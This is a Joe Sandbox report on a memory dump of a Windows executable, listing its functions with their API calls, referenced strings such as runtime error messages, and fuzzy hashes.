Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f58dd15d21904bcc164e31bf50b4b102cc5807a30a5de8de7b746150142607d4
Instruction ID: fb2708ae4fdd6f25c55d24db33691b80a1f0fd62f550056595683113ddd79866
Opcode Fuzzy Hash: f58dd15d21904bcc164e31bf50b4b102cc5807a30a5de8de7b746150142607d4
Instruction Fuzzy Hash: 41115C31A0CE82A2FA68E731D741139E2529F46FB0F544734E87EC66D6FE2CE4118300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32D878 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF61D32D8A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF61D32D938
RtlUnwindEx.KERNEL32 ref: 00007FF61D32D987

Strings

f, xrefs: 00007FF61D32D8B6
csm, xrefs: 00007FF61D32D91E

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
Instruction ID: 0778660459c1b780e20537335d482f129cd78d9725024e5f1132601749ed9aa9
Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
Instruction Fuzzy Hash: 81518132E19A0286D754DB29F408B69B795FB45FACF518130EA4E87748FF38E94187C4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D322600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF61D3227EF), ref: 00007FF61D322638
DialogBoxIndirectParamW.USER32 ref: 00007FF61D3226FC
DeleteObject.GDI32 ref: 00007FF61D32272F
DestroyIcon.USER32 ref: 00007FF61D322741

Strings

Unhandled exception in script, xrefs: 00007FF61D322668

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
Instruction ID: 6254cc7d1004f8280377dd2be61239d1b67a1269013cdc6e232e69011fbadc11
Opcode Fuzzy Hash: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
Instruction Fuzzy Hash: 2C318176A18E8285EB24DF35E8551F9A360FF8ABA8F400135EA4D8BB59EF3CD104C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3229E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14

Part of subcall function 00007FF61D328570: GetLastError.KERNEL32(00000000,00007FF61D322A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D328597
Part of subcall function 00007FF61D328570: FormatMessageW.KERNEL32 ref: 00007FF61D3285C6

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

MessageBoxW.USER32 ref: 00007FF61D322AF0
MessageBoxA.USER32 ref: 00007FF61D322B0C

Strings

%s%s: %s, xrefs: 00007FF61D322A6B
Fatal error detected, xrefs: 00007FF61D322AC6, 00007FF61D322AFE

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
Instruction ID: d52ddbf1433157318d4a07528fbdea790f699cc07e341500cadedf667591f9f3
Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
Instruction Fuzzy Hash: 41315872A28E8191E634DB20F4516DAA364FF85FD4F804136EA8D83A59EF3CD705CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33A118 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF61D33A13D
GetProcAddress.KERNEL32 ref: 00007FF61D33A153
FreeLibrary.KERNEL32 ref: 00007FF61D33A17A

Strings

mscoree.dll, xrefs: 00007FF61D33A134
CorExitProcess, xrefs: 00007FF61D33A14C

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
Instruction ID: 3c8cfaf031e44254b0857547ba2147927c37fd18421593aefe818737cf1c508a
Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
Instruction Fuzzy Hash: BEF06271F09F0291FB188B24E84437A9320AF4AF71F541235D96E862E4EF2DD445C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D349D40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF61D349D68
_set_statfp.LIBCMT ref: 00007FF61D349D83
_set_statfp.LIBCMT ref: 00007FF61D349D9F
_set_statfp.LIBCMT ref: 00007FF61D349DDB

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: d077b85c5747253178703e3a8c205bf1d9aad8a045c6c4fef06b8b88206bb7bb
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: 14117036E1DE4301F7541568E84637A90406F9BB74F09063CEA6E873EAFF2EA8414224

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33BA50 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BA6F
FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BA8E
FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BAB6
FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BAC7
FlsSetValue.KERNEL32(?,?,?,00007FF61D33AC67,?,?,00000000,00007FF61D33AF02,?,?,?,?,?,00007FF61D3331CC), ref: 00007FF61D33BAD8

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 265f34380d67657989a0cfe7ba8fe7e8e2f3d4f226bb85804e174d5fdd11ec01
Instruction ID: 2e30021089eae6329cc8568cde704e077da3e9816d231479578b535a04a76596
Opcode Fuzzy Hash: 265f34380d67657989a0cfe7ba8fe7e8e2f3d4f226bb85804e174d5fdd11ec01
Instruction Fuzzy Hash: AA113D31E08E8261FA98D325DB51179D2915F46FB0F548334E87EC66D6FE6CE5018200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33B8E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF61D33B8F5
FlsSetValue.KERNEL32 ref: 00007FF61D33B914
FlsSetValue.KERNEL32 ref: 00007FF61D33B93C
FlsSetValue.KERNEL32 ref: 00007FF61D33B94D
FlsSetValue.KERNEL32 ref: 00007FF61D33B95E

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8c16e6d9311cdbb9998562dc17313de43228e32bcfe8a9d2b657955b0bb400fb
Instruction ID: e01b494e4e2b7234c604de643903c204b05d9335e709abb1847742fc70c62e31
Opcode Fuzzy Hash: 8c16e6d9311cdbb9998562dc17313de43228e32bcfe8a9d2b657955b0bb400fb
Instruction Fuzzy Hash: 7B112730E09A0762FA6CE331D61227AD2814F47F70F584734D87ECA2D2FE2DB5418251

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3365B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3365F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33671A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3367D0

Strings

verbose, xrefs: 00007FF61D3365C4

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: c32cf88514697760d1f8f1270f3dd306ddd9ae91f4b40d26b45c55ae2b7de487
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: 4591D132A08E46AAF721CE25DA5077DB790AB46FA4F844136DA5E873D5EF3CE445E300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3406A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D340987

Part of subcall function 00007FF61D346AC4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF61D346AE1

Strings

UTF-16LEUNICODE, xrefs: 00007FF61D340925
UTF-8, xrefs: 00007FF61D340906
ccs, xrefs: 00007FF61D3408C2

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
Instruction ID: 3bb4d8498f54eb6b3f16bb270587afd62da913b2342c7b61756b37d6950e8f70
Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
Instruction Fuzzy Hash: BE81A472F0CE3285F7A44F25861027CFAA0AB13F64F558035CA49D72A5FF2EE9019781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32F0D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF61D32F124
_CallSETranslator.LIBVCRUNTIME ref: 00007FF61D32F173

Strings

MOC, xrefs: 00007FF61D32F138
RCC, xrefs: 00007FF61D32F141

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
Instruction ID: 1d1acb0f853333f8bb35827b21edaabe389834e98da5ee2237ad7e6da46b125c
Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
Instruction Fuzzy Hash: 75615A37A08B458AE7108F66D4413ADB7B0FB4ABACF144225EE4D57B99DF38E145C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32F434 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF61D32F45C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF61D32F544

Strings

csm, xrefs: 00007FF61D32F47E
csm, xrefs: 00007FF61D32F596

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
Instruction ID: 132664ff216d08bff8d47310fd46e8a201b167d227c5b27bb9f301f91d44ba14
Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
Instruction Fuzzy Hash: 9C518E33D08A8286EB748F369544269B7A0FB56FACF144135DA9D87B95EF3CE450CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D322890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

MessageBoxW.USER32 ref: 00007FF61D32299B
MessageBoxA.USER32 ref: 00007FF61D3229B7

Strings

%s%s: %s, xrefs: 00007FF61D322916
Fatal error detected, xrefs: 00007FF61D322971, 00007FF61D3229A9

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
Instruction ID: 80bbf8d9f38651897a2546485680286c4ae46bb2c83a622795dc227b818021b2
Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
Instruction Fuzzy Hash: 6A315872A28E8191E634DB20E4516DAA354FF85FD4F804136E68D87A99EF3CD705CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D323ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D323F01

Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF61D323F3A
Failed to get executable path., xrefs: 00007FF61D323F0B
GetModuleFileNameW, xrefs: 00007FF61D323F12

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
Instruction ID: 12baf1a1772612dce50f33d52f430dd6c6cfed6877764662a066e99de32c8b50
Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
Instruction Fuzzy Hash: CE014431F1DF4291FA649730E8553B5D2A1AF5AFA8F800036E94DC6696FF1CE1448750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33CC60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF61D33CCDF
WriteFile.KERNEL32 ref: 00007FF61D33CFA7
WriteFile.KERNEL32 ref: 00007FF61D33CFED
GetLastError.KERNEL32 ref: 00007FF61D33D0A3

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
Instruction ID: 1f2a399893ab5ee3ce8a15938b745603c6322d028db4027da54e2239bd193247
Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
Instruction Fuzzy Hash: 31D10532B19E8199E711CF79D5402ACB7B1FB46FA8B048235DE5D97B99EE38D406C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D335954 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF61D335987
GetFileInformationByHandle.KERNEL32 ref: 00007FF61D3359E9
GetLastError.KERNEL32 ref: 00007FF61D335A7A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF61D33588C), ref: 00007FF61D335AC6

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
Instruction ID: a7c981ae6bd9edabfcad71c87052b8acc7c84fb51865dce2b4c0a866be557cf5
Opcode Fuzzy Hash: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
Instruction Fuzzy Hash: 52517D32A08A819AFB54DFB1D5903BDA3A1AF49FA8F148534DE0D876C9EF38E4409740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D322330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF61D322364
SetWindowLongPtrW.USER32 ref: 00007FF61D322386
GetWindowLongPtrW.USER32 ref: 00007FF61D3223B0
InvalidateRect.USER32 ref: 00007FF61D3223D0

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

